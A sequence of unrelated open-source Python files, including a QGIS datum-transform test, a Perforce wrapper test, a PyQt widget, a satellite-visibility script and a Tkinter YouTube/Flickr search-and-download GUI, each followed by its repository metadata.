self.assertEqual(ops[op2_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op2_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op2_index].accuracy, 0.05)
self.assertEqual(len(ops[op2_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op2_index].grids[0].shortName, 'GDA94_GDA2020_conformal_and_distortion.gsb')
else:
self.assertEqual(ops[op2_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_and_distortion.tif')
self.assertEqual(ops[op2_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op2_index].grids[0].packageName)
self.assertIn('http', ops[op2_index].grids[0].url)
self.assertTrue(ops[op2_index].grids[0].directDownload)
self.assertTrue(ops[op2_index].grids[0].openLicense)
if QgsProjUtils.projVersionMajor() == 6:
op3_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op3_index = [i for i in range(len(ops)) if ops[
i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][
0]
self.assertTrue(ops[op3_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op3_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op3_index].accuracy, 0.05)
self.assertEqual(len(ops[op3_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].grids[0].shortName, 'GDA94_GDA2020_conformal.gsb')
else:
self.assertEqual(ops[op3_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal.tif')
self.assertEqual(ops[op3_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op3_index].grids[0].packageName)
self.assertIn('http', ops[op3_index].grids[0].url)
self.assertTrue(ops[op3_index].grids[0].directDownload)
self.assertTrue(ops[op3_index].grids[0].openLicense)
if QgsProjUtils.projVersionMajor() == 6:
op4_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_cocos_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op4_index = [i for i in range(len(ops)) if ops[
i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_cocos_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][
0]
self.assertTrue(ops[op4_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op4_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_cocos_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op4_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_cocos_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op4_index].accuracy, 0.05)
self.assertEqual(len(ops[op4_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op4_index].grids[0].shortName, 'GDA94_GDA2020_conformal_cocos_island.gsb')
else:
self.assertEqual(ops[op4_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_cocos_island.tif')
self.assertEqual(ops[op4_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op4_index].grids[0].packageName)
self.assertIn('http', ops[op4_index].grids[0].url)
if QgsProjUtils.projVersionMajor() == 6:
op5_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_christmas_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op5_index = [i for i in range(len(ops)) if ops[
i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_christmas_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][
0]
self.assertTrue(ops[op5_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op5_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_christmas_island.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg')
else:
self.assertEqual(ops[op5_index].proj,
'+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_christmas_island.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[op5_index].accuracy, 0.05)
self.assertEqual(len(ops[op5_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op5_index].grids[0].shortName, 'GDA94_GDA2020_conformal_christmas_island.gsb')
else:
self.assertEqual(ops[op5_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_christmas_island.tif')
self.assertEqual(ops[op5_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op5_index].grids[0].packageName)
self.assertIn('http', ops[op5_index].grids[0].url)
# uses a pivot datum (technically a proj test, but this will help me sleep at night ;)
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:7899'))
self.assertGreaterEqual(len(ops), 3)
op1_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
self.assertTrue(ops[op1_index].name)
self.assertEqual(ops[op1_index].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
self.assertTrue(ops[op1_index].isAvailable)
self.assertEqual(ops[op1_index].accuracy, 0.01)
self.assertEqual(len(ops[op1_index].grids), 0)
if QgsProjUtils.projVersionMajor() == 6:
op2_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
else:
op2_index = [i for i in range(len(ops)) if ops[
i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][
0]
self.assertTrue(ops[op2_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op2_index].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
else:
self.assertEqual(ops[op2_index].proj,
'+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
self.assertEqual(ops[op2_index].accuracy, 0.05)
self.assertEqual(len(ops[op2_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op2_index].grids[0].shortName, 'GDA94_GDA2020_conformal_and_distortion.gsb')
else:
self.assertEqual(ops[op2_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_and_distortion.tif')
self.assertEqual(ops[op2_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op2_index].grids[0].packageName)
self.assertIn('http', ops[op2_index].grids[0].url)
self.assertTrue(ops[op2_index].grids[0].directDownload)
self.assertTrue(ops[op2_index].grids[0].openLicense)
if QgsProjUtils.projVersionMajor() == 6:
op3_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
else:
op3_index = [i for i in range(len(ops)) if ops[
i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][
0]
self.assertTrue(ops[op3_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
else:
self.assertEqual(ops[op3_index].proj,
'+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
self.assertEqual(ops[op3_index].accuracy, 0.05)
self.assertEqual(len(ops[op3_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].grids[0].shortName, 'GDA94_GDA2020_conformal.gsb')
else:
self.assertEqual(ops[op3_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal.tif')
self.assertEqual(ops[op3_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op3_index].grids[0].packageName)
self.assertIn('http', ops[op3_index].grids[0].url)
self.assertTrue(ops[op3_index].grids[0].directDownload)
self.assertTrue(ops[op3_index].grids[0].openLicense)
@unittest.skipIf(QgsProjUtils.projVersionMajor() < 6, 'Not a proj6 build')
def testNoLasLos(self):
"""
Test that operations which rely on an las/los grid shift file (which are unsupported by Proj6) are not returned
"""
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3035'),
QgsCoordinateReferenceSystem('EPSG:5514'))
self.assertEqual(len(ops), 3)
self.assertTrue(ops[0].name)
self.assertTrue(ops[0].proj)
self.assertTrue(ops[1].name)
self.assertTrue(ops[1].proj)
self.assertTrue(ops[2].name)
self.assertTrue(ops[2].proj)
if __name__ == '__main__':
unittest.main()
|
telwertowski/QGIS
|
tests/src/python/test_qgsdatumtransforms.py
|
Python
|
gpl-2.0
| 18,982
|
#! /usr/bin/python
'''
Created on Sep 20, 2014
@author: Grzegorz Pasieka (grz.pasieka@gmail.com)
Copyright (C) 2014 Grzegorz Pasieka
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''
import sys
import os
sys.path.append(os.path.abspath(os.getcwd()+"/.."))
from config_wrapper import get_branch_credentials
from p4_wrapper import p4_wrapper
#globals
p4port = "localhost:1818"
p4user = "g.pasieka"
p4client = "test_depot_g.pasieka"
p4passwd = "zaq12WSX"
def main(argv):
global p4port
global p4user
global p4client
global p4passwd
#change working dir to separate test_proj
test_dir = os.path.abspath("../../test_proj")
os.chdir(test_dir)
#(p4port, p4user, p4client) = get_branch_credentials("test-branch")
#TODO: add creating p4 repo for test
res = test_logging()
print "test_logging: "+str(res)
if not res:
return
res = test_client_read_write()
print "test_client_read_write: "+str(res)
res = test_changelists()
print "test_changelists: "+str(res)
res = test_files()
print "test_files: "+str(res)
res = test_sync()
print "test_sync: "+str(res)
def test_logging():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if res:
res = p4w.p4_logout()
return res
def test_client_read_write():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return res
(res, p4conf) = p4w.p4_client_read()
if res == False or p4conf == None:
print "ERROR: p4_client_read failed"
p4w.p4_logout()
return False
old_descr = p4conf._description
p4conf._description = "New descr"
p4w.p4_client_write(p4conf)
(res, p4conf) = p4w.p4_client_read()
if p4conf._description != "New descr\n":
print "ERROR: Description has not changed (1st)"
res = p4w.p4_logout()
return False
p4conf._description = old_descr
p4w.p4_client_write(p4conf)
(res, p4conf) = p4w.p4_client_read()
if p4conf._description != old_descr:
print "ERROR: Description has not changed (2st)"
res = p4w.p4_logout()
return False
res = p4w.p4_logout()
return res
def test_changelists():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return False
(res, changes_all) = p4w.p4_changelists()
if len(changes_all) == 0:
print "ERROR: Getting all changelists failed"
return False
#TODO: add more tests for various cases
res = p4w.p4_logout()
return res
def test_files():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return False
(res, files_all) = p4w.p4_files()
if len(files_all) == 0:
print "ERROR: Getting all files failed"
return False
(res, files_ch1) = p4w.p4_files(None, None, "1")
if len(files_ch1) != 1:
print "ERROR: Getting files from changelist no 1 failed"
return False
(res, files_ch2) = p4w.p4_files(None, "1", "2")
if len(files_ch2) != 2:
print "ERROR: Getting files from changelists no 1-2 failed"
return False
(res, files_ch3) = p4w.p4_files(None, "2", None)
if len(files_ch3) != 3:
print "ERROR: Getting files from changelists no 2-now failed"
return False
res = p4w.p4_logout()
return res
def test_sync():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return False
(res, file_list) = p4w.p4_sync(None, '1', True, True, 0)
(res, file_list) = p4w.p4_sync(None, '2', True, True, 0)
(res, file_list) = p4w.p4_sync(None, 2, True, True, 0)
(res, file_list) = p4w.p4_sync(None, '#head', True, True, 0)
return res
if __name__ == "__main__":
main(sys.argv)
|
GregObake/git-p4-hybrid
|
test/test_p4_wrapper.py
|
Python
|
gpl-2.0
| 4,622
|
# Distributed under the MIT licesnse.
# Copyright (c) 2013 Dave McCoy (dave.mccoy@cospandesign.com)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
#of the Software, and to permit persons to whom the Software is furnished to do
#so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
'''
Log
7/21/2013: Initial commit
'''
import os
import sys
import json
import inspect
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from visual_graph.box import Box
from build_status import BuildStatus
class BuildBox(Box):
def __init__(self,
scene,
position,
name,
ID,
color,
parameter,
rect):
super(BuildBox, self).__init__(position = position,
scene = scene,
name = name,
color = color,
rect = rect,
user_data = parameter)
self.movable(False)
self.label_rect = QRectF(self.rect)
self.label_rect.setWidth(self.rect.width() * 0.75)
self.status_rect = QRectF(self.rect)
self.status_rect.setTopLeft(self.label_rect.topRight())
self.status_rect.setWidth(self.rect.width() * 0.25)
self.status_box = BuildStatus(scene, self.label_rect.topRight(), self.status_rect, self)
self.build_cb = None
self.ID = ID
self.setToolTip(parameter)
def contextMenuEvent(self, event):
menu_items = (("&Help", self.build_help),)
menu = QMenu(self.parentWidget())
for text, func in menu_items:
menu.addAction(text, func)
menu.exec_(event.screenPos())
def set_build_callback(self, build_cb):
self.build_cb = build_cb
def build_help(self):
print "Help"
def get_status(self):
return self.status_bux.get_status()
def set_status(self, status):
self.status_box.set_status(status)
def status_update(self):
#print "animation update"
self.scene().invalidate(self.mapToScene(self.rect).boundingRect())
def mouseDoubleClickEvent(self, event):
print "Mouse double click event"
if self.build_cb is not None:
self.build_cb(self.ID)
#Paint
def paint(self, painter, option, widget):
highlight_width = 8
pen = QPen(self.style)
pen.setColor(Qt.black)
pen.setWidth(1)
if option.state & QStyle.State_Selected:
#Selected
pen.setColor(QColor("black"))
pen.setWidth(highlight_width)
painter.setPen(pen)
painter.drawRect(self.rect)
rect = self.label_rect
painter.drawRect(rect)
painter.fillRect(rect, QColor(self.color))
painter.setFont(self.text_font)
#draw text
pen.setColor(Qt.black)
painter.setPen(pen)
self.add_label_to_rect(painter, rect, self.box_name)
self.status_box.paint(painter, option, widget)
#Draw Status
|
CospanDesign/nysa-gui
|
NysaGui/ibuilder/view/builder/build_box.py
|
Python
|
gpl-2.0
| 3,979
|
from fcntl import flock, LOCK_EX, LOCK_UN
from tempfile import TemporaryFile
class TempfileLock:
def __init__(self):
self.handle = TemporaryFile()
def lock(self):
flock(self.handle, LOCK_EX)
def unlock(self):
flock(self.handle, LOCK_UN)
def __del__(self):
self.handle.close()
|
andbof/plantdb
|
plant/tempfilelock.py
|
Python
|
gpl-2.0
| 331
|
#!/usr/bin/python
import math
import time
import ephem
import os
from datetime import datetime
from process import makestuff
def get_them(name,cnt):
count = 0
for gps in visiblesats:
if name in gps.name:
plist.append(gps)
count += 1
if count==cnt:
break
satelit = []
visiblesats = []
plist = []
min_alt = 10. * math.pi / 180.
# This is Lisbon, Portugal
home = ephem.Observer()
home.lon = '-9.9' # +E
home.lat = '34.44' # +N
home.elevation = 10 # meters
satt = makestuff()
sats = satt.split('*')
for tle in sats:
sat = tle.split('|')
if sat[0] != '':
satelit.append(ephem.readtle(sat[0],sat[1],sat[2]))
for sat in satelit:
home.date = datetime.utcnow()
sat.compute(home)
if sat.alt > 0.174532925199:
#print sat.name, " is visible ", sat.range , " ", sat.alt
visiblesats.append(sat)
# filter hoe many we want
get_them('GPS',1)
get_them('COS',1)
get_them('IRI',2)
get_them('HIS',1)
for sat in plist:
for tle in sats:
sat1 = tle.split('|')
if sat1[0] == sat.name:
print sat1[0]
print sat1[1]
print sat1[2]
|
luisfcorreia/pas
|
showlist.py
|
Python
|
gpl-2.0
| 1,070
|
#! /usr/bin/env python3.3
#Search interface that gives Flickr and Youtube Results
#make the root window
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from ast import literal_eval
from subprocess import check_output
from os import chdir, getcwd
home = getcwd()
root = Tk()
#finds a directory
# dirname = filedialog.askdirectory()
#state variables
query = StringVar()
# Results will change, but must be stated as an empty string.
yt_results= StringVar()
fl_results= StringVar()
list_yt_results = StringVar()
list_fl_results = StringVar()
list_results = StringVar()
searchmsg = StringVar()
num_yt_results = IntVar()
num_fl_results = IntVar()
num_results = IntVar()
# list_selection = StringVar()
yt_list_selection = StringVar()
fl_list_selection = StringVar()
list_selection = StringVar()
selectiones = StringVar()
maxResult = IntVar()
colored_rows = StringVar()
maxResult.set(10)
colors = {'Youtube': '#f0f0ff', 'Flickr': '#ffccff'}
titles = ['Youtube', 'Flickr']
#Define in-action functions; in this case, define the search function that will
#open a new terminal and run the youtube search function I've already made in
#python 2.7 that doesn't import well into python 3.
# def download(*args):
def Search(*args):
from os import chdir
from subprocess import check_output
l_results = []
# try:
if ch_box_yt.state()[0] == 'selected':
q = query.get()
# chdir('/Users/socialmedia/Desktop/GUI/youtubeAnalytics-cmd-line-sample/')
maxRes = maxResult.get()
search = check_output(['/usr/bin/python2.7','ytSearch.py', q, str(maxRes)])
res = search.decode("utf-8")
yt_results.set(res)
make_list_yt_results()
searchmsg.set("Showing results for " + q)
for i in range(0, num_yt_results.get(), 2):
yt_lbox.itemconfigure(i, background=colors['Youtube'])
if ch_box_yt.state()[0] == 'deselected':
yt_results.set('')
make_list_yt_results
if ch_box_fl.state()[0]== 'selected':
from subprocess import check_output
# from os import chdir
q = query.get()
# chdir('/Users/socialmedia/Desktop/GUI/')
maxRes = maxResult.get()
search = check_output(['/usr/bin/python2.7','Flickr Search.py', q, str(maxRes)])
res = search.decode("utf-8")
fl_results.set(res)
make_list_fl_results()
# searchmsg.set("Showing results for " + q)
for i in range(0, num_fl_results.get() ,2):
fl_lbox.itemconfigure(i, background=colors['Flickr'])
res = literal_eval(res)
if ch_box_fl.state()[0] == 'deselected':
fl_results.set('')
make_list_fl_results()
# for line in literal_eval(res):
# l_results += [line]
# list_results = tuple(l_results)
# except:
# pass
def make_list_yt_results(*args):
r = literal_eval(yt_results.get())
num_yt_results.set(len(r))
l = []
for n in range(len(r)):
l+=["%02d" % (n+1)+'.\t'+r[n]['title']]
l =tuple(l)
list_yt_results.set(l)
def make_list_fl_results(*args):
r = literal_eval(fl_results.get())
num_fl_results.set(len(r))
l = []
# for line in r:
# l+=[line['title']]
for n in range(len(r)):
l+=["%02d" % (n+1)+'.\t'+r[n]['title']]
l =tuple(l)
list_fl_results.set(l)
def addSelection(*args):
try:
yt_old = literal_eval(yt_list_selection.get())
except:
yt_old = []
try:
fl_old = literal_eval(fl_list_selection.get())
except:
fl_old = []
try:
fl_new = fl_lbox.curselection()
except:
fl_new = []
try:
yt_new = yt_lbox.curselection()
except:
yt_new = []
yt_selection = set(yt_old) | set(yt_new)
fl_selection = set(fl_old) | set(fl_new)
yt_list_selection.set(sorted(tuple(yt_selection), key=float))
fl_list_selection.set(sorted(tuple(fl_selection), key=float))
showSelection()
def removeSelection(*args):
try:
yt_old = list(literal_eval(yt_list_selection.get()))
except:
yt_old = []
try:
fl_old = list(literal_eval(fl_list_selection.get()))
except:
fl_old = []
ys = len(yt_old)
fs = len(fl_old)
remove = selection_list.curselection()
# print(remove)
yt_indeces = []
fl_indeces = []
for r in remove:
if int(r) == 0 or ys+1:
pass
if int(r) < ys+1:
yt_indeces += [int(r) - 1]
if int(r) > ys+1:
fl_indeces += [int(r) - (ys+2)]
yt_r = []
fl_r = []
for i in yt_indeces:
yt_r+= yt_old[i]
for i in fl_indeces:
fl_r+= fl_old[i]
yt_new = set(yt_old) - set(yt_r)
fl_new = set(fl_old) - set(fl_r)
yt_list_selection.set(sorted(tuple(yt_new), key=float))
fl_list_selection.set(sorted(tuple(fl_new), key=float))
showSelection()
def showSelection(*args):
try:
yt_index = list(literal_eval(yt_list_selection.get()))
except:
yt_index = []
try:
fl_index = list(literal_eval(fl_list_selection.get()))
except:
fl_index = []
indeces = [{'index':yt_index, 'title': 'Youtube', 'select': [], 'res': literal_eval(list_yt_results.get())},
{'index':fl_index, 'title': "Flickr", 'select':fl_index, 'res': literal_eval(list_fl_results.get())}]
selections = ()
colored_rows = {}
for i in indeces:
select = ()
for d in i['index']:
select += tuple([i['res'][int(d)]])
select = tuple([i['title']])+tuple(select)
colored_rows[len(selections)]= i['title']
selections += select
selectiones.set(selections)
for r in range(len(selections)):
if r in colored_rows.keys():
selection_list.itemconfigure(r, background=colors[colored_rows[r]])
else:
selection_list.itemconfigure(r, background='')
def clearSelection(*args):
yt_list_selection.set(())
fl_list_selection.set(())
showSelection()
def saveAs(*args):
yt_selection = literal_eval(yt_list_selection.get())
fl_selection = literal_eval(fl_list_selection.get())
dirname = filedialog.askdirectory()
chdir(dirname)
try:
yt_res = literal_eval(yt_results.get())
except:
pass
try:
fl_res = literal_eval(fl_results.get())
except:
pass
for y in yt_selection:
try:
id = yt_res[int(y)]['description']['videoId']
downloadYt(id)
except:
pass
fl_ids = []
for f in fl_selection:
id = fl_res[int(f)]['id']
fl_ids += [id]
downloadFl(fl_ids, dirname)
chdir(home)
# for f in fl_selection:
# id =
def downloadYt(id):
url = 'https://www.youtube.com/watch?v='+str(id)
try:
search = check_output(['youtube-dl', url, '-f', '137+140'])
except:
try:
search = check_output(['youtube-dl', url])
except:
pass
def downloadFl(ids, dirname):
urls = []
for id in ids:
url = check_output(['/usr/bin/python2.7', home+'/Flickr_get_Original.py', id])
url = url[:-1]
url = url.decode('utf-8')
urls += ['-O', url]
search = ['/usr/bin/curl']+urls
chdir(dirname)
check_output(search)
def preview(*args):
#try all listbox variables for none-empty values; if selection is a list, preview only the first of them
try:
yt_curse = yt_lbox.curselection()
yt_res = literal_eval(yt_results.get())
id = yt_res[int(yt_curse[0])]['description']['videoId']
previewYT(id)
except:
pass
try:
fl_curse = fl_lbox.curselection()
fl_res = literal_eval(fl_results.get())
id = fl_res[int(fl_curse[0])]['id']
# print(id)
url = check_output(['/usr/bin/python2.7',home+'/Flickr_get_medium.py', id])
previewFL(url)
except:
raise
# try:
# ser_curse = ser_lbox.curselection()
def previewYT(id):
url = 'https://www.youtube.com/watch?v='+str(id)
search = check_output(['/usr/bin/open', url, '-a', 'vlc'])
def previewFL(url):
search = check_output(['/usr/bin/open','-g', url, '-a', 'vlc'])
# def preview(*args):
# Create and grid the outer content frame
c = ttk.Frame(root, padding=(10,10,12,0))
c.grid(column=0, row=0, sticky=(N,W,S,E))
root.grid_columnconfigure(0, weight=1)
root.grid_rowconfigure(0,weight=1)
#Create all widgets
query_entry = ttk.Entry(c, textvariable=query, width=50)
yt_lbox = Listbox(c, listvariable=list_yt_results, height=11, selectmode='extended')
fl_lbox = Listbox(c, listvariable=list_fl_results, height=11, selectmode='extended')
yt_lbl = ttk.Label(c, text="Youtube Search Results:", justify='left')
fl_lbl = ttk.Label(c, text="Flickr Search Results:", justify='left')
search = ttk.Button(c, text='Search', command=Search, default='active')
status = ttk.Label(c, textvariable=searchmsg, justify='right')
max_results = Spinbox(c, from_=10, to=50, textvariable=maxResult, width = 5)
# Make a sub-frame for the options and results
options = ttk.Frame(c, padding=0)
# ch_box_yt = ttk.Checkbutton(options, text='Youtube', instate='selected');
